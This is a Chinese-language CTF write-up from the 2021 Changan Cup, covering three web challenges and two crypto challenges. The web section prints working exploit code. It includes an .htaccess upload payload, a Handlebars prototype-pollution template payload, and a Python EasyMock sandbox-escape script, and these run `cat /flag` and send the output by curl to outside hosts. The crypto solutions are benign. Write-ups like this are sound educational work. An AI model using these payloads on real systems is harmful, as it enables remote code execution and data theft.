2021长安杯｜Web & Crypto 部分wp合集

admin

101085
文章

87
评论

2021年9月24日10:25:50评论554 views字数 7816阅读26分3秒阅读模式

web方向

K1ng_in_h3Ap_I

新

K1ng_in_h3Ap_I

闻

K1ng_in_h3Ap_I

1. noupload

允许上传png、htaccess

<Files ~ "^.ht">        Require all granted        Order allow,deny        Allow from allphp_flag engine on</Files>SetHandler application/x-httpd-php # <?=`cat /flag` ?>

2. SimpleHub

Status可以污染{{this.constructor}}

https://snyk.io/vuln/SNYK-JS-HANDLEBARS-1056767

{{#with (__lookupGetter__ "__proto__")}} {{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}} {{#with ../constructor.prototype}} {{../../constructor.defineProperty . "hasOwnProperty" ..}} {{/with}} {{/with}} {{/with}} {{#with "constructor"}} {{#with split}} {{pop (push "global.process.mainModule.constructor._load('child_process').exec('curl -X POST -A `cat /flag` http://fto41s.ceye.io);")}} {{#with .}} {{#with (concat (lookup join (slice 0 1)))}} {{#each (slice 2 3)}} {{#with (apply 0 ../..)}} {{.}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}}

3. EasyMock

import requestsimport jsonimport randomimport string
target = ' http://0c1b8228.yunyansec.com/' username = ''.join(random.sample(string.ascii_letters + string.digits, 8))password = ''.join(random.sample(string.ascii_letters + string.digits, 8))print(username)print(password)# can't see the result of commandcmd = 'curl http://118.25.154.15:9999/`cat /flag`'
# registerurl = target + "/api/u/register"cookies = {"SSO_LANG_V2": "EN"}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}json_data={"name": username, "password": password}requests.post(url, headers=headers, cookies=cookies, json=json_data)
# loginurl = target + "/api/u/login"cookies = {"SSO_LANG_V2": "EN"}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}json_data={"name": username, "password": password}req = requests.post(url, headers=headers, cookies=cookies, json=json_data).textlogin = json.loads(req)token = login['data']['token']
# create projecturl = target + "/api/project/create"cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/new", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}json_data={"description": "just a poc", "group": "", "id": "", "members": [], "name": username, "swagger_url": "", "url": "/" + username}requests.post(url, headers=headers, cookies=cookies, json=json_data)
# get project_idurl = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0"cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Authorization": "Bearer " + token, "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}req = requests.get(url, headers=headers, cookies=cookies).textprojects = json.loads(req)project_id = projects['data'][0]['_id']
# create mockurl = target + "/api/mock/create"cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}json_data={"description": "poc", "method": "get", "mode": "{n  'foo': 'Syntax Demo',n  'name': function() {n    return (function() {n      TypeError.prototype.get_process = f => f.constructor("return process")();n      try {n        Object.preventExtensions(Buffer.from("")).a = 1;n      } catch (e) {n        return e.get_process(() => {}).mainModule.require("child_process").execSync("" + cmd + "").toString();n      }n    })();n  }n}", "project_id": project_id, "url": "/" + username}requests.post(url, headers=headers, cookies=cookies, json=json_data)
# preview mockurl = target + "/mock/{}/{}/{}".format(project_id,username,username)cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://127.0.0.1:7300/mock/{}/{}/{}".format(project_id,username,username), "Content-Type": "application/json", "Connection": "close", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}requests.get(url, headers=headers, cookies=cookies)

‍

crypto方向

1. EzPy

20进制转回去，然后在256下乘以233的逆。

至于取一位还是两位，手撸，眼看。

from Crypto.Util.number import inverseflag=""dd=['4A', '65', '8B', '0F', '5J', '44', '5J', '2A', '3D', '2A', '1D', '5J', '17', '88', '3D', '7D', '7D', 'BH', '1A', '9B', 'BH', '5J', '78', '7','5J', 'C0', '9E', '3D', '17', '78', '75', '17', 'BH', '5J', '2A', '3D', '8B', '75', '17', '5J', '3D', '3G', '9B', '7', '9E', '75', '78', '88', '2D', '5J', '3D', '1A', '4', '5J', '4', 'BH', '2D', '8G', '1A', '8B', '78', '9E', '3D', '78', 'BH', '5J', '3D', '1A', '5J', '8G', '52', 'BH', '9E', 'AE', '3G', '7', '3J', '5J', '75', '1A', '5J', 'CE', '65', '2D', 'A8', '1D']for each in dd:  tmp = chr(int(each,20) * inverse(233,256)%256)  flag += tmpprint(flag)

2. checkin

利用2^e-pow(2,e,n)获取kn，爆破p获取kq，分解kq得到q，rsa解密，威尔逊走一波。

from Crypto.Util.number import *e = 1049x = 4513855932190587780512692251070948513905472536079140708186519998265613363916408288602023081671609336332823271976169443708346965729874135535872958782973382975364993581165018591335971709648749814573285241290480406050308656233944927823668976933579733318618949138978777831374262042028072274386196484449175052332019377c = 3303523331971096467930886326777599963627226774247658707743111351666869650815726173155008595010291772118253071226982001526457616278548388482820628617705073304972902604395335278436888382882457685710065067829657299760804647364231959804889954665450340608878490911738748836150745677968305248021749608323124958372559270n = (pow(2,e) - x)for q in range(2**15,2**16):  if n % q == 0:    break
p = n // q# yafup = 170229264879724117919007372149468684565431232721075153274808454126426741324966131188484635914814926870341378228417496808202497615585946352638507704855332363766887139815236730403246238633855524068161116748612090155595549964229654262432946553891601975628848891407847198187453488358420350203927771308228162321231d = inverse(e,(p-1)*(q-1))m = pow(c,d,n)for i in range(p-q,p):  m = m*i % pprint(long_to_bytes(-m%p))

- END -

2021长安杯｜Web & Crypto 部分wp合集

相关推荐: 上车出发！E安全带你逛“互联网之光”博览会

介绍由国家网信办和浙江省政府共同举办的2021年世界互联网大会乌镇峰会，将于9月26日至28日在浙江乌镇召开。本届博览会以“迈向数字文明新时代——携手构建网络空间命运共同体”为主题。 &nb…

左青龙
微信扫一扫

右白虎
微信扫一扫

2021长安杯｜Web & Crypto 部分wp合集

K1ng_in_h3Ap_I

K1ng_in_h3Ap_I

K1ng_in_h3Ap_I

K1ng_in_h3Ap_I

航空公司收集的个人隐私远超想象

Nacos 漏洞利用姿势大全

QoS特性详解

“火绒剑”独立版下载

实战 | 记某次逆向小程序解密及签名破解

生成式人工智能如何赋能SOC分析师？

cnvd通用型漏洞挖掘思路-从逻辑漏洞到拒绝服务漏洞

开源 | 基于4G卡 + 华为云 IoT + 微信小程序的物联网智能储物柜

Smuggler：一款功能强大的HTTP请求走私和去同步安全测试工具

010Editor 14.0 逆向分析工具

发表评论

在线咨询

微信